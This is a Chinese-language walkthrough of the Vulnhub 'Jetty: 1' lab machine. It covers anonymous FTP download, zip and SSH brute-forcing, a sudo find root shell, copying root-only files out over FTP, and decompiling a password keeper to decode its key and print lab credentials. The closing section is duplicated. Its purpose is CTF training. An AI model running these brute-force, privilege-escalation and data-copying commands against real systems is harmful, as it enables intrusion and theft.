Vulnhub Jetty 1

Vulnhub Jetty: 1

靶场搭建

下载地址：https://www.vulnhub.com/entry/jetty-1,621/

渗透测试

信息收集

探测靶机IP

arp-scan -l

端口探测

nmap -p- -sV -sC -A 192.168.131.134

21 FTP 端口

80 http

65507 ssh

其中ftp存在匿名登录漏洞

访问80端口

目录扫描

gobuster dir -u http://192.168.131.134 -w /usr/share/wordlists/dirb/big.txt -x php

发现robots.txt

访问

老三步走完开始漏洞利用环节

漏洞利用

前面发现ftp匿名登录漏洞

直接匿名登录看看

l出不来。。。

只能登陆成功

上网搜搜

wget -r ftp://192.168.131.134

总之是知道里面有东西

看不了直接全下载了

查看文件

cat README.txt

提示 zip 文件被加密，密码为公司默认密码，在观看完毕后需把 FTP 服务关闭

压缩包密码爆破

因为不知道压缩包密码，且没有发现相关信息所以只能爆破

fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt sshpass.zip

解压压缩包

unzip sshpass.zip
cat sshpass.txt

记录了 SSH 的密码为Squ1d4r3Th3B3$t0fTh3W0rLd

前面扫到了65507端口就是ssh

但是不知道用户名

用户名爆破

hydra -L /usr/share/wordlists/dirb/others/names.txt -p Squ1d4r3Th3B3$t0fTh3W0rLd ssh://192.168.131.134:65507

爆破不出来可能靶场被爆破也有问题

上网搜搜

发现原来靶机前面有提示

存在账号 Squiddie

ssh squiddie@192.168.131.134 -p 65507

• Extra information:The suspicious username is Squiddie.He was in charge of the ticket selling for the Aquarium.Ethernet settings set to NAT with DHCP enabled.You should find the IP in your VLAN.

提权

使用 python3 切换 pty

python3 -c "import pty;pty.spawn('/bin/bash')"

主机上同时存在 python2 和 python3，通过 python2 交互界面进行操作

python>import pty
>pty.spawn('/bin/bash')

sudo提权

查看当前用户是否存在 sudo 权限

sudo -l

其中find命令是不需要密码

利用 find 命令提权

sudo find . -exec /bin/sh \; -quit

提权成功

切换pty

python3 -c "import pty;pty.spawn('/bin/bash')"

通过 find 命令寻找root.txt

find / -name root.txt

进入/root目录下查看，成功发现两个文件

cat note.txtcat proof.txt

获取证据

信息收集

我们的目的不只是提权到 root 用户外还要获得证据，查看定时任务

crontab -l

表示每隔2分钟执行一次/etc/cron.daily/backup文件脚本

卡了，，，

cat /etc/cron.daily/backup

其使用 rsync 进行文件同步

文件从/root/Documents/.docs向/var/backups/.docs备份

cd /root/Documents/.docs
cd /var/backups/.docs

复制该目录下的文件至/home/ftp目录下

cp -r /root/Documents/.docs/. /home/ftp/docs/

通过 wget 下载其中的docs目录，最好还是先打包再下载比较好

wget -nH -m --ftp-user=ftp ftp://192.168.131.134/docs/

需要密码才能打开

查看password_keeper目录下的文件内容

## database.txt
instagram T9Y0Ku/oDv80H8CUzBKkwQ==facebook IXKnuKh73jCOKcEZAaHnIQ==Accountabilty_not_cooked rbRH72cf3UiHXcmQB6o0OA==MoneyBalance rRd3m80KzzTik3Eu9BRWy95GsORKwD+adfTUfPLaxVk=Pending_to_erase aneylFYmV/jz/7g5j+Ck15oreK1VhmaKmTwa8cdSnpY=
## usage.txt
Usage:   *Linux: wine password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)  *Windows: password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)
This program was compiled using pyinstaller. 

要想获得表格的密码，得到小程序输入的密码即可，将程序反编译，并分析代码

这个程序是用pyinstaller编译的，可以使用工具反编译得到源码

Python反编译

password_keeper.exe

他给了这个文件直接砸windows上运行即可

利用 pyinstxtractor 还原其中的文件，成功发现password_keeper.pyc

工具地址：

https://github.com/extremecoders-re/pyinstxtractor

使用 uncompyle 进行反编译，但 uncompyle6 提示需要在 python2.6-3.8 环境下执行

pip install uncompyle
uncompyle6 password_keeper.pyc > ../pass.py

源码如下：

# uncompyle6 version 3.9.1

# Python bytecode version base 2.7 (62211)

# Decompiled from: Python 3.9.8 (main, Nov  7 2021, 15:47:09) 

# [GCC 11.2.0]

# Embedded file name: password_keeper.py

from Cryptodome.Cipher import AES
import base64
BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1])]

def cipher_message(key, message, iv):
    message = pad(message)
    key = base64.b64decode(key)
    obj = AES.new(key, AES.MODE_CBC, iv)
    ciphertext = obj.encrypt(message)
    ciphertext = base64.b64encode(ciphertext)
    return ciphertext


def decipher_message(key, ciphertext, iv):
    ciphertext = base64.b64decode(ciphertext)
    key = base64.b64decode(key)
    obj2 = AES.new(key, AES.MODE_CBC, iv)
    decipher_text = obj2.decrypt(ciphertext)
    decipher_text = unpad(decipher_text)
    return decipher_text


def generate_key(ciphertext, tag, key, iv):
    ciphertext = cipher_message(key, ciphertext, iv)
    print ''
    print "Now copy this into your database.txt (It's the free version... pay for an automated tool!)"
    print ''
    print 'Tag Password'
    print tag + ' ' + ciphertext


def show_keys(database, key, iv):
    check_permissions = raw_input('Insert password: ')
    if base64.b64encode(check_permissions) == key:
        for i in range(len(database[0])):
            ciphertext = database[1][i]
            decipher = decipher_message(key, ciphertext, iv)
            print ' '
            print 'Tag: ' + database[0][i] + ' Password: ' + decipher
            print ' '

    else:
        print ''
        print 'Tag: Instagram Password: WRONG '
        print 'Tag: Facebook  Password: PASSWORD '
        print 'Tag: SSH       Password: TRY '
        print 'Tag: root      Password: HARDER! '
        print ''


def read_database():
    database = [[], []]
    f = open('database.txt', 'r')
    for line in f.readlines():
        line = line.strip().split()
        database[0].append(line[0])
        database[1].append(line[1])

    f.close()
    return database


def main():
    print 'Welcome to the best password keeper ever!'
    print '__        __         _                _  __                         '
    print '\\ \\      / /__  __ _| | ___   _      | |/ /___  ___ _ __   ___ _ __ '
    print " \\ \\ /\\ / / _ \\/ _` | |/ / | | |_____| ' // _ \\/ _ \\ '_ \\ / _ \\ '__|"
    print '  \\ V  V /  __/ (_| |   <| |_| |_____| . \\  __/  __/ |_) |  __/ |   '
    print '   \\_/\\_/ \\___|\\__,_|_|\\_\\__,  |     |_|\\_\\___|\\___| .__/ \\___|_|   '
    print '                          |___/                    |_|   '
    iv = '166fe2294df5d0f3'
    key = 'N2FlMjE4ZmYyOTI4ZjZiMg=='
    database = read_database()
    loop = True
    while loop:
        print ''
        print 'Choose what you want to do: '
        print '1) See your passwords!'
        print '2) Generate a cipher-password'
        print '3) Close'
        option = raw_input('Insert your selection here --> ')
        if option == '1':
            print ''
            print 'Showing content of your secret passwords...'
            print ''
            show_keys(database, key, iv)
            print ''
            returned = raw_input('Press any button to return to the menu...')
        elif option == '2':
            print ''
            print ''
            title = raw_input('Type the name of the application: ')
            password = raw_input('Type the password(BEWARE OF SHOULDER SURFING!!!): ')
            generate_key(password, title, key, iv)
            print ''
            print ''
            returned = raw_input('Press any button to return to the menu...')
        elif option == '3':
            loop = False
            print ''
            return 'Bye Byeeeeeeeeeeeee'
        print ''
        print ''
        print 'WHAT? FAILURE TO COMMUNICATE... Reseting connection...'
        print ''
        print ''
        returned = raw_input('Press any button to return to the menu...')


if __name__ == '__main__':
    print main()

#okay decompiling password_keeper.pyc

输入1后会调用show_keys()函数，而该函数将输入进行 base64 编码并与 key 进行对比。模拟程序通过 base64 对 key 进行解码，成功拿到密码为7ae218ff2928f6b2

echo "N2FlMjE4ZmYyOTI4ZjZiMg==" | base64 -d

同时拿到文档的密码，从而拿到犯罪证据

Tag: instagram Password: S3x1B0y
Tag: facebook Password: M4rK1sS0s3X1
Tag: Accountabilty_not_cooked Password: co8oiads13kt
Tag: MoneyBalance Password: C5Y0wzGqq4Xw8XGD
Tag: Pending_to_erase Password: 1hi2ChHrtkQsUTOc

过 base64 对 key 进行解码，成功拿到密码为7ae218ff2928f6b2

echo "N2FlMjE4ZmYyOTI4ZjZiMg==" | base64 -d

同时拿到文档的密码，从而拿到犯罪证据

Tag: instagram Password: S3x1B0y
Tag: facebook Password: M4rK1sS0s3X1
Tag: Accountabilty_not_cooked Password: co8oiads13kt
Tag: MoneyBalance Password: C5Y0wzGqq4Xw8XGD
Tag: Pending_to_erase Password: 1hi2ChHrtkQsUTOc

[外链图片转存中…(img-CH9VfGL5-1712570569034)]

[外链图片转存中…(img-xPKCSIDc-1712570569034)]

[外链图片转存中…(img-eaRopq53-1712570569034)]